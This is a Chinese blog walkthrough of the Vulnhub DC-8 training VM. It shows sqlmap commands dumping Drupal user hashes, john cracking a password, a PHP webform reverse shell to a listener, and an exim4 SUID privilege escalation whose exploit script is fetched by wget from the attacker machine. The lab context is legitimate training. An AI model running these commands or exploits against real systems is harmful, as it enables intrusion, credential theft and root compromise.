看完这篇 教你玩转渗透测试靶机vulnhub——DC8

已于 2024-01-17 16:15:46 修改
阅读量1.9k 收藏 17
点赞数 13
分类专栏: 渗透测试 # Vulnhub靶场 文章标签: 安全 网络 web安全
于 2022-04-07 20:12:34 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Aluxian_/article/details/123966297
版权

Vulnhub靶机DC8渗透测试详解

Vulnhub靶机介绍:

vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。

靶机DC8 还是老样子只有拿到root权限才可以发现最终的flag。

Vulnhub靶机下载:

官网地址:https://download.vulnhub.com/dc/DC-8.zip

Vulnhub靶机安装:

下载好了把安装包解压 然后试用VMware即可。
在这里插入图片描述
在这里插入图片描述

Vulnhub靶机漏洞详解:

①:信息收集:

kali里使用netdiscover发现主机
在这里插入图片描述

渗透机:kali IP :192.168.0.103 靶机IP :192.168.0.104

使用命令:nmap -sS -sV -A -n 192.168.0.104

在这里插入图片描述
发现开启了80端口和22端口 访问192.168.0.104 又是这个熟悉的界面drupal 点击左侧的Details发现url有id 可能存在注入点
在这里插入图片描述
Droopescan是一款基于插件的扫描器,可帮助安全研究人员发现Drupal,SilverStripe,Wordpress,Joomla(枚举版本信息和可利用URL地址)和Moodle的问题。

下载安装:

git clone https://github.com/droope/droopescan.git

cd droopescan

pip install -r requirements.txt

./droopescan scan --help

使用工具droopescan扫一下后台(因为也是第一次使用所以也是学习了一下)后台地址: 192.168.0.104/user/login

②:暴力破解:

使用sqlmap工具即可(也可以手动) 但是工具方便点 直接使用命令:

sqlmap -u http://192.168.0.104/?nid=1 --dbs #列出数据库

在这里插入图片描述

sqlmap -u http://192.168.0.104/?nid=1 -D d7db --tables  #列出数据库的表

在这里插入图片描述

sqlmap -u http://192.168.0.104/?nid=1 -D d7db -T users --columns #列出字段

在这里插入图片描述

sqlmap -u http://192.168.0.104/?nid=1 -D d7db -T users -C name,pass -dump #列出账号和密码

在这里插入图片描述
获取到adminjohn密码加密后的密文 然后新建一个pass.txt 把密文放进去使用john 进行破解 密码:turtle
在这里插入图片描述
然后使用john用户登入即可。 发现登入成功!!!
在这里插入图片描述
发现Content->点击edit->点击WEBFORMS->点击Form settings->点击下拉框选择PHP code
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
代码写入保存后,kali监听1234端口,在Contact Us页面随便输入信息点击Submit后,查看kali已得到shell。

在这里插入图片描述
写一个python交互 :python -c 'import pty;pty.spawn("/bin/bash")'
在这里插入图片描述

③:提权:

使用find命令查找具有suid权限的命令,找到一个exim4命令,exim是一款在Unix系统上使用的邮件服务,exim4在使用时具有root权限
在这里插入图片描述
在这里插入图片描述
使用searchsploit命令搜索exim相关漏洞
在这里插入图片描述
然后把46996.sh拷贝到本地并改名为666.sh,并在kali开启http服务 service apache2 start

cp /usr/share/exploitdb/exploits/linux/local/46996.sh 666.sh
cat 666.sh
cp 666.sh  /var/www/html

需要进入/tmp 路径下 (不然没有权限 就下载不了)然后给 一个权限:chmod 777 666.sh
在这里插入图片描述
在这里插入图片描述
然后根据脚本提示 进行提权 发现提权失败!!! 可能是格式问题,需要在主机上将脚本格式设置成符合unix格式。然后重新上传和下载在这里插入图片描述
在这里插入图片描述

wget 192.168.0.103/666.sh
chmod 777 666.sh
ls -l

在这里插入图片描述

④:获取flag:

在这里插入图片描述
至此看到了flag,渗透测试结束。

Vulnhub靶机渗透总结:

这是做的第九个靶场了,学习的知识点和一些细节就是 :
1.提权的时候需要设置编码 set: ff=unix不然会报错(这很重要!!!)

新知识点:
1.学习了Droopescan工具的使用
2.学习了exim4提权方式
最后 自己也会把这系列的靶机继续更新,创作不易 希望对大家有所帮助!!

落寞的魚丶
关注
  • 13
    点赞
  • 17
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 6
    评论
专栏目录
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
DC靶机系列:DC-3
Ays.Ie的博客
02-22 228
本篇文章为DC系列第三个靶机,该篇文章详细的记录了渗透的思路和整个渗透的过程,希望能够帮助到他人,同时加深自己的印象以及熟练自己的操作
靶机DC-8(详细渗透,适合新手渗透
热门推荐
君莫hacker的博客
09-05 1万+
目录靶机DC-8 (详细渗透,适合新手渗透)0x01靶机描述0x02环境搭建1. 下载并导入靶机2. 查看网络适配器3. 启动靶机0x03靶机渗透一、 信息收集1. 主机发现2. 端口扫描3. 详细扫描4. 目录扫描5. gobuster目录扫描6. 网站指纹识别二、 漏洞挖掘手工sql注入1. 通过手工验证,此处url含有sql注入漏洞2. 判断字段数3. 判断显示位置4. 查看当前数据库5. 查找库d7db中所有的表6. 查找uesrs表中所有的列7. 查询表中的数据sqlmap自动化执行1. 查当前数
DC-5靶机
mlws1900的博客
03-25 640
得知文件包含漏洞,我们可以在ssh日志,中间件日志以及临时文件中写入一句话木马然后进行包含,即可解析。我们可以利用nginx日志写入一句话木马。切换nat模式,有问题全选重试和是,打到这了,我感觉这个配置我都不用写了,启动靶机如下图所示即可。啥玩意没有,点击contact,发现一个留言板,测试了xss啥也没有。以上操作要在bp中发包,我直接在浏览器中修改,不知道为什么无法写入。如上图所示,我试了在浏览器中无法写入日志,打开蚁剑连接shell。上面那个没试过,下面这个试了成功, 都需要在bp中进行操作。
MS08-067靶机下载
边城浪子的博客
09-08 1626
利用Windows平台MS08-067漏洞,成功进行远程命令执行操作,无奈没有靶机实验,真实的互联网中也没有这样的漏洞啊。 MS08-067靶机下载地址 链接: https://pan.baidu.com/s/13IS0vBZTduDHdInOrO4pyQ 提取码: ip53
靶机9 DC-8(过程超详细)
honest_gg的博客
09-26 2008
DC靶场一共有9个,对于学习渗透测试人员,有很大的帮助,是非常不错的靶场。
vulnhub靶机DC4
weixin_52450702的博客
11-02 588
dc-4靶机ip:192.168.70.163靶机下载地址:https://download.vulnhub.com/dc/DC-4.zip.torrent。
Vulnhub靶场----8、DC-8
七天
03-03 731
Vulnhub-DC8
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
kali渗透综合靶机(七)--Super-Mario-Host靶机
W小哥
03-14 1316
一、靶机下载 下载链接:https://download.vulnhub.com/zico/zico2.ova 二、zico2靶机搭建 将下载好的靶机环境,用VMware导入即可使用,文件->打开 导入到合适位置即可,默认是C盘,成功导入虚拟机之后,打开即可 三、攻击过程 kali IP:192.168.27.128 靶机IP:192.168.27.132 1、主机发现 nmap ...
kali渗透综合靶机(五)--zico2靶机
W小哥
03-10 1300
一、靶机下载 下载链接:https://download.vulnhub.com/zico/zico2.ova 二、node1靶机搭建 将下载好的靶机环境,用VMware导入即可使用,文件->打开 导入到合适位置即可,默认是C盘,成功导入虚拟机之后,打开即可 三、攻击过程 kali IP:192.168.27.128 靶机IP:192.168.27.132 1、主机发现 nmap ...
VulnHub-DarkHole_2靶机实战(超详细保姆级程),2024年最新普通二本的辛酸网络安全面试之路
最新发布
2401_84184567的博客
04-10 284
321。
VulnHub渗透测试实战靶场笔记(持续更新)
晚风不及你
03-05 7120
Breach1.0 下载链接 https://download.vulnhub.com/breach/Breach-1.0.zip 靶机说明 Breach1.0是一个难度为初级到中级的BooT2Root/CTF挑战。 VM虚机配置有静态IP地址(192.168.110.140),需要将虚拟机网卡设置为host-only方式组网。非常感谢Knightmare和rastamouse进行测试和提供反馈。...
Vunlnhub靶机DC-9渗透详解
m0_65712192的博客
03-06 964
Vunlnhub靶机DC-9渗透详解
靶场练习第十八天~vulnhub靶场之hackableII
qq_57976347的博客
02-17 568
一、准备工作 kali和靶机都选择NAT模式(kali与靶机同网段) 1.靶场环境 下载链接:Hackable: II ~ VulnHub 2.kali的ip 命令:ifconfig 3.靶机的ip 扫描靶机ip sudo arp-scan -l 正在上传…重新上传取消 二、信息收集 1.nmap的信息收集 (1)扫描靶机开放的端口及其服务 nmap -sC -A -p- 192.168.101.124 2.网站信息收集 (1)靶机开放了80端口,先访问靶机网站看看有什
vulnhub Breakout靶机渗透
weixin_67567251的博客
10-13 1078
vulnhub Breakout靶机渗透
vulnhub靶机——raven: 2
09-03
Raven: 2是一台中级难度的boot2root虚拟机,目标是获取四个标志(flag)。Raven Security在多次遭受入侵后,采取了额外措施来加固他们的web服务器,以防止黑客入侵。你可以在Vulnhub上找到Raven: 2的ova文件,并使用VirtualBox打开。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [vulnhub靶机raven2](https://blog.csdn.net/weixin_52450702/article/details/127811079)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [vulnhub靶机——RAVEN: 2](https://blog.csdn.net/qq_44029310/article/details/126491848)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [Vulnhub靶机系列:Kioptrix: Level 1.2 (#3)](https://download.csdn.net/download/weixin_38717843/14052717)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 6
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

落寞的魚丶

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值